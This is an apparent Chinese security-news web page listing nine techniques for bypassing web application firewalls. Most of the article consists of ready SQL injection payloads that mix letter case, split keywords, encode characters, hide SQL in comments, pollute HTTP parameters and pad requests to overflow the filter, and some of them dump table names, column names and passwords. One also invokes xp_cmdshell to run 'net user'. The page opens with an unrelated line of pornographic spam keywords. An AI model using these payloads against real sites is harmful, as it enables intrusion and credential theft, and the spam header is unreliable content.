国产成人毛片毛片久久网_国产午夜激无码av毛片不_国产乱对白精彩在线播放_av资源站中文字幕_亚洲男人的天堂网站_国产成 人 综合 亚洲网_中国国产激情一区_少妇一级淫片免费放_亚洲一本大道av久在线播放_免费观看美女裸体网站

安全播報(bào)

防御吧作為15年知名老牌域名服務(wù)商,CNNIC和CANN雙認(rèn)證域名注冊(cè)商,已經(jīng)
持續(xù)為500多萬(wàn)個(gè)域名提供服務(wù),包括智能DNS/自由轉(zhuǎn)移/隱私保護(hù)等服務(wù)!
這9種方式可以繞過(guò)Web應(yīng)用程序防火墻
2020-11-28 10:27:55 【

Web應(yīng)用程序防火墻(WAF)的主要作用是過(guò)濾,監(jiān)控和阻止各類進(jìn)出Web應(yīng)用程序的HTTP流量。WAF區(qū)別于常規(guī)防火墻,因?yàn)閃AF能夠過(guò)濾特定Web應(yīng)用程序的內(nèi)容,而常規(guī)防火墻充當(dāng)?shù)膭t是服務(wù)器之間的安全門(mén)。通過(guò)檢查HTTP流量,它可以防止源自Web應(yīng)用安全漏洞的攻擊,如SQL注入,XSS,文件包含和安全配置錯(cuò)誤。

  Web應(yīng)用程序防火墻WAF是如何工作的?

  協(xié)議異常檢測(cè):拒絕不符合HTTP標(biāo)準(zhǔn)的請(qǐng)求
  增強(qiáng)的輸入驗(yàn)證:代理和服務(wù)器端驗(yàn)證,而不僅僅是客戶端驗(yàn)證
  白名單和黑名單
  基于規(guī)則和基于異常的保護(hù):基于規(guī)則的更依賴黑名單機(jī)制,基于異常則更靈活
  狀態(tài)管理:關(guān)注會(huì)話保護(hù)還有:Cookie保護(hù),反入侵規(guī)避技術(shù),響應(yīng)監(jiān)控和信息披露保護(hù)。

  如何繞過(guò)WAF?

  1. 當(dāng)我們?cè)谀繕?biāo)URL進(jìn)行SQL注入測(cè)試時(shí),可以通過(guò)修改注入語(yǔ)句中字母的大小寫(xiě)來(lái)觸發(fā)WAF保護(hù)情況。如果WAF使用區(qū)分大小寫(xiě)的黑名單,則更改大小寫(xiě)可能會(huì)幫我們成功繞過(guò)WAF的過(guò)濾。
  http://www.xxxxx.com/index.php?page_id=-15 uNIoN sELecT 1,2,3,4

  2. 關(guān)鍵字替換(在關(guān)鍵字中間可插入將會(huì)被WAF過(guò)濾的字符) – 例如SELECT可插入變成SEL
  http://www.xxxxx.com/index.php?page_id=-15 UNIunionON SELselectECT 1,2,3,4

  3. 編碼
  + URL encode
  page.php?id=1%252f%252a*/UNION%252f%252a /SELECT +Hex encode
  www.xxxxx.com/index.php?page_id=-15 /*!u%6eion*/ /*!se%6cect*/ 1,2,3,4…   SELECT(extractvalue(0x3C613E61646D696E3C2F613E,0x2f61)) +Unicode encode
  ?id=10%D6‘%20AND%2201=2%23    SELECT '?'='A'; #1

   4. 使用注釋
  在攻擊字符串中插入注釋。例如,/*!SELECT*/ 這樣WAF可能就會(huì)忽略該字符串,但它仍會(huì)被傳遞給目標(biāo)應(yīng)用程序并交由mysql數(shù)據(jù)庫(kù)處理。
  index.php?page_id=-15 %55nION/**/%53ElecT 1,2,3,4     'union%a0select pass from users#  index.php?page_id=-15 /*!UNION*/ /*!SELECT*/ 1,2,3    ?page_id=null%0A/**//*!50000%55nIOn*//*yoyu*/all/**/%0A/*!%53eLEct*/%0A/*nnaa*/+1,2,3,4…

   5. 某些函數(shù)或命令,因?yàn)閃AF的過(guò)濾機(jī)制導(dǎo)致我們無(wú)法使用。那么,我們也可以嘗試用一些等價(jià)函數(shù)來(lái)替代它們。
  hex()、bin() ==> ascii()   sleep() ==>benchmark()   concat_ws()==>group_concat()  substr((select 'password'),1,1) = 0x70    strcmp(left('password',1), 0x69) = 1      strcmp(left('password',1), 0x70) = 0    strcmp(left('password',1), 0x71) = -1 mid()、substr() ==> substring()  @@user ==> user()  @@datadir ==> datadir()

   6. 使用特殊符號(hào)
  這里我把非字母數(shù)字的字符都規(guī)在了特殊符號(hào)一類,特殊符號(hào)有特殊的含義和用法。
  + ` symbol: select `version()`; + +- :select+id-1+1.from users; + @:select@^1.from users; +Mysql function() as xxx +`、~、!、@、%、()、[]、.、-、+ 、|、%00 示例
  ‘se’+’lec’+’t’   %S%E%L%E%C%T 1   1.aspx?id=1;EXEC(‘ma’+'ster..x’+'p_cm’+'dsh’+'ell ”net user”’)  ' or --+2=- -!!!'2      id=1+(UnI)(oN)+(SeL)(EcT)

   7. HTTP參數(shù)控制
  通過(guò)提供多個(gè)參數(shù)=相同名稱的值集來(lái)混淆WAF。例如 http://www.xxxxx.com?id=1&?id=’ or ‘1’=’1′ — ‘在某些情況下(例如使用Apache/PHP),應(yīng)用程序?qū)H解析最后(第二個(gè)) id= 而WAF只解析第一個(gè)。在應(yīng)用程序看來(lái)這似乎是一個(gè)合法的請(qǐng)求,因此應(yīng)用程序會(huì)接收并處理這些惡意輸入。如今,大多數(shù)的WAF都不會(huì)受到HTTP參數(shù)污染(HPP)的影響,但仍然值得一試。
  + HPP(HTTP Parameter Polution))
  /?id=1;select+1,2,3+from+users+where+id=1—    /?id=1;select+1&id=2,3+from+users+where+id=1—    /?id=1/**/union/*&id=*/select/*&id=*/pwd/*&id=*/from/*&id=*/users HPP又稱做重復(fù)參數(shù)污染,最簡(jiǎn)單的就是?uid=1&uid=2&uid=3,對(duì)于這種情況,不同的Web服務(wù)器處理方式如下:
  +HPF (HTTP Parameter Fragment)
  這種方法是HTTP分割注入,同CRLF有相似之處(使用控制字符%0a、%0d等執(zhí)行換行)
  /?a=1+union/*&b=*/select+1,pass/*&c=*/from+users--   select * from table where a=1 union/* and b=*/select 1,pass/* limit */from users— +HPC (HTTP Parameter Contamination)
  RFC2396定義了以下字符:
  Unreserved: a-z, A-Z, 0-9 and _ . ! ~ * ' () Reserved : ; / ? : @ & = + $ , Unwise : { } | \ ^ [ ] ` 不同的Web服務(wù)器處理處理構(gòu)造得特殊請(qǐng)求時(shí)有不同的邏輯:
  以魔術(shù)字符%為例,Asp/Asp.net會(huì)受到影響

  8. 緩沖區(qū)溢出
  WAF和其他所有的應(yīng)用程序一樣也存在著各種缺陷和漏洞。如果出現(xiàn)緩沖區(qū)溢出的情況,那么WAF可能就會(huì)崩潰,即使不能代碼執(zhí)行那也會(huì)使WAF無(wú)法正常運(yùn)行。這樣,WAF的安全防護(hù)自然也就被瓦解了。
  ?id=1 and (select 1)=(Select 0xA*1000)+UnIoN+SeLeCT+1,2,version(),4,5,database(),user(),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 9. 整合繞過(guò)
  當(dāng)使用單一的方式無(wú)法繞過(guò)時(shí),我們則可以靈活的將多種方式結(jié)合在一起嘗試。
  www.xxxxx.com/index.php?page_id=-15+and+(select 1)=(Select 0xAA[..(add about 1000 "A")..])+/*!uNIOn*/+/*!SeLECt*/+1,2,3,4…   id=1/*!UnIoN*/+SeLeCT+1,2,concat(/*!table_name*/)+FrOM /*information_schema*/.tables /*!WHERE */+/*!TaBlE_ScHeMa*/+like+database()– -   ?id=-725+/*!UNION*/+/*!SELECT*/+1,GrOUp_COnCaT(COLUMN_NAME),3,4,5+FROM+/*!INFORMATION_SCHEM*/.COLUMNS+WHERE+TABLE_NAME=0x41646d696e--

】【打印關(guān)閉】 【返回頂部
分享到QQ空間
分享到: 
上一篇一次新型無(wú)文件攻擊形式的勒索病.. 下一篇虛假VPN附加組件在Microsoft Edge..

立足首都,輻射全球,防御吧專注云防御及云計(jì)算服務(wù)15年!

聯(lián)系我們

服務(wù)熱線:13051179500 18910191973
企業(yè)QQ:1245940436
技術(shù)支持:010-56159998
E-Mail:xihedata.com
Copyright ? 2003-2016 fangyuba. 防御吧(完美解決防御與加速) 版權(quán)所有 增值許可:京B2-20140042號(hào)
售前咨詢
公司總機(jī):18910191973
24小時(shí)電話:010-56159998
投訴電話:18910191973
值班售后/技術(shù)支持
售后服務(wù)/財(cái)務(wù)
備案專員
緊急電話:18610088800